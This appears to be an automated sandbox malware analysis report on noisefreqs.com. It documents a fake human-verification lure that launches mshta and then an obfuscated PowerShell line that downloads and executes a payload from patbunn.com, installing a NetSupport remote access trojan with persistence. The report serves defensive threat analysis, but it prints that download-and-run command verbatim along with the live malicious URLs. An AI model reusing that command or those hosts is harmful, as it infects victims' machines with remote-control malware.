Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://noisefreqs.com

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 16:41

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    http://noisefreqs.com

Score
10/10
netsupportdefense_evasiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://noisefreqs.com/Ray-verify.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://patbunn.com/o/o.png

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Netsupport family
    netsupport
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://noisefreqs.com
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd5f9f46f8,0x7ffd5f9f4708,0x7ffd5f9f4718
      2⤵
        PID:4960
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
        2⤵
          PID:2828
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2168
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
          2⤵
            PID:4092
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
            2⤵
              PID:4100
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
              2⤵
                PID:732
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
                2⤵
                  PID:4992
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4172
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
                  2⤵
                    PID:2716
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
                    2⤵
                      PID:3696
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
                      2⤵
                        PID:1572
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
                        2⤵
                          PID:1064
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,17835816925061820695,16998248980786959587,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4292
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:4640
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:2360
                          • C:\Windows\system32\mshta.exe
                            "C:\Windows\system32\mshta.exe" http://noisefreqs.com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 2083''
                            1⤵
                            • Blocklisted process makes network request
                            • Checks computer location settings
                            PID:4436
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://patbunn.com/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                              2⤵
                              • Blocklisted process makes network request
                              • Adds Run key to start application
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4072
                              • C:\Windows\system32\ipconfig.exe
                                "C:\Windows\system32\ipconfig.exe" /flushdns
                                3⤵
                                • Gathers network information
                                PID:1368
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\GvcTui
                                3⤵
                                • Hide Artifacts: Hidden Files and Directories
                                PID:2412
                                • C:\Windows\system32\attrib.exe
                                  attrib +h C:\Users\Admin\AppData\Roaming\GvcTui
                                  4⤵
                                  • Views/modifies file attributes
                                  PID:720
                              • C:\Users\Admin\AppData\Roaming\GvcTui\client32.exe
                                "C:\Users\Admin\AppData\Roaming\GvcTui\client32.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:2192
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:1824

                            Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                    Filesize

                                    152B

                                    MD5

                                    85ba073d7015b6ce7da19235a275f6da

                                    SHA1

                                    a23c8c2125e45a0788bac14423ae1f3eab92cf00

                                    SHA256

                                    5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

                                    SHA512

                                    eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                    Filesize

                                    152B

                                    MD5

                                    7de1bbdc1f9cf1a58ae1de4951ce8cb9

                                    SHA1

                                    010da169e15457c25bd80ef02d76a940c1210301

                                    SHA256

                                    6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

                                    SHA512

                                    e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    5KB

                                    MD5

                                    a86c9ba85e119cf8385a5a738975083b

                                    SHA1

                                    ea0ae46bf4ce9e0ad77dd09a7b847424c2e2d576

                                    SHA256

                                    95f70c599f21d3489270ff5e186f07a8c37ad93bf83e7c3bc073be53c8a39c1d

                                    SHA512

                                    63227ee569b7a7cc281e6ac146b51e8f2db641bcb567148865a6b6f16333209ab289c5bc3fec028e1c2351fc751a5855d0cca1284217ddffc67d8c9696ba10f4

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    6KB

                                    MD5

                                    0a6dea65aaafe8b4a05baba68a768023

                                    SHA1

                                    febc2518201a9741749b1162272863e12b25e322

                                    SHA256

                                    9e0e51ed1ef9defd95699e4d277fcd78b6a5fcb28c23af4da7764e3ec1378f10

                                    SHA512

                                    2de5cbe10e362eaa3e6a66a7c799136d2621684840dc943dc69922826d6934d32fc1086e1eaa46665b8c4027e081fe44a436003b54f8a57682d4e1bcd267f02f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    11KB

                                    MD5

                                    569e12bd15b743e9f71bff6c8e14efcd

                                    SHA1

                                    cf7dbef6703dede8601c1d5bbfb6aba7b7ce583f

                                    SHA256

                                    86f6bae6ffe1ab99cbcc5a4364f44274e17760baf5df9464dfe2bb21f037976e

                                    SHA512

                                    70949abc652f7b7891c219f461971c0af5545049939dac6ff881a23805bd5eafcdb369c060df0bfa2eb7d77554ad25f32c19adcb1cd2db58449abfbd51accbd7

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    10KB

                                    MD5

                                    738373c2e6f7bee67e5bebbf90fb0f34

                                    SHA1

                                    78724f8a9205c8dd745f21b07d309cd1852a6ee0

                                    SHA256

                                    e59208a0972b2a87a79f61317a3efb5d48c0d669bb56cf3a74d053eb7b01fd9c

                                    SHA512

                                    a1957de616d0d0d49eaa786d031fad7836f50807daa4febb7d6cba2b4c57d9aeb8e4b2476b08b92845c8fa3d405305de8228287fb777b5ab7ef7d00e7c6e98ef

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    10KB

                                    MD5

                                    4bfc8b29c7353d1840c78ecd635b6514

                                    SHA1

                                    bc868c12b5034859ea1ff5f1295b34023c200eb8

                                    SHA256

                                    7bdc9a3c9b30df587af7061da049776ebf626c76f76517a4dcc716cba951f888

                                    SHA512

                                    044e2c17a5f0cd7f78fb8cc4aa75ba7745540310335fb2b7920f6abdd0695dd94d7b74a573afb4ad3e30797fd8075b93e537790beb315bb8e106349f7a8323ca

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iappzlp0.biy.ps1
                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\HTCTL32.DLL
                                    Filesize

                                    320KB

                                    MD5

                                    2d3b207c8a48148296156e5725426c7f

                                    SHA1

                                    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                                    SHA256

                                    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                                    SHA512

                                    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\NSM.LIC
                                    Filesize

                                    257B

                                    MD5

                                    390c964070626a64888d385c514f568e

                                    SHA1

                                    a556209655dcb5e939fd404f57d199f2bb6da9b3

                                    SHA256

                                    ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54

                                    SHA512

                                    f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\PCICHEK.DLL
                                    Filesize

                                    18KB

                                    MD5

                                    a0b9388c5f18e27266a31f8c5765b263

                                    SHA1

                                    906f7e94f841d464d4da144f7c858fa2160e36db

                                    SHA256

                                    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                                    SHA512

                                    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\PCICL32.dll
                                    Filesize

                                    3.6MB

                                    MD5

                                    00587238d16012152c2e951a087f2cc9

                                    SHA1

                                    c4e27a43075ce993ff6bb033360af386b2fc58ff

                                    SHA256

                                    63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

                                    SHA512

                                    637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\client32.exe
                                    Filesize

                                    117KB

                                    MD5

                                    ee75b57b9300aab96530503bfae8a2f2

                                    SHA1

                                    98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

                                    SHA256

                                    06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

                                    SHA512

                                    660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\client32.ini
                                    Filesize

                                    647B

                                    MD5

                                    8c978a6d8f380d59c9db4afe06218b89

                                    SHA1

                                    1fa286e91c8aa0eeb99276af72d40e02d2148c51

                                    SHA256

                                    d8c2b28ff9f90626f7e669b4fbdb45ed553a3cb1a980e23fdfea4fbbdddfc502

                                    SHA512

                                    b74539ae7fc88756c1e1404814d33197cd8709aaddf2c43167f2cf157e947c2cabad759414038dbe5e83b201786052e94ab53bd97bb4de68744f514f8ae7f552

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\msvcr100.dll
                                    Filesize

                                    755KB

                                    MD5

                                    0e37fbfa79d349d672456923ec5fbbe3

                                    SHA1

                                    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                                    SHA256

                                    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                                    SHA512

                                    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\GvcTui\pcicapi.dll
                                    Filesize

                                    32KB

                                    MD5

                                    dcde2248d19c778a41aa165866dd52d0

                                    SHA1

                                    7ec84be84fe23f0b0093b647538737e1f19ebb03

                                    SHA256

                                    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                                    SHA512

                                    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

                                    Download Submit

                                  • memory/4072-83-0x0000020B099C0000-0x0000020B099E2000-memory.dmp

                                    Filesize

                                    136KB

                                    Download